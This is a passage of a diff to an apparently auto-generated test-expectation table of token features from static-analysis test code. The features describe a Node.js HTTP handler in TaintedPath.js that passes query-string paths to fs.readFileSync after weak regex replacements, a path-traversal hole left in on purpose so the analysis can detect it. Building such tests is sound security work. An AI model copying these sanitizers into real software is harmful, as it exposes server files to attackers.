autogenerated/TaintedPath/TaintedPath.js:184:31:184:34 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:34 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:34 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:42 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:42 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:42 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:42 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:42 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | path.re ... /g, '') | calleeImports | fs | @@ -6416,6 +65049,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:184:31:184:53 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:184:36:184:42 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:36:184:42 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:36:184:42 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:36:184:42 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:36:184:42 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:184:44:184:48 | /\\./g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:184:44:184:48 | /\\./g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:184:44:184:48 | /\\./g | calleeImports | url | @@ -6434,6 +65072,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:184:51:184:52 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:184:51:184:52 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:184:51:184:52 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:6 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:6 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:6 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:6 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:6 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:12 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:12 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:12 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:12 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:12 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:4:185:60 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:8:185:12 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:8:185:12 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:8:185:12 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:8:185:12 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:8:185:12 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:15 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:15 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:15 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:15 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:15 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:28 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:28 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:28 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:28 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:28 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6442,6 +65120,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:185:14:185:59 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:185:17:185:28 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:17:185:28 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:17:185:28 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:17:185:28 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:17:185:28 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:33 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:33 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:33 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:33 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:33 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:41 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:41 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:41 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:41 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:41 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:185:30:185:58 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | 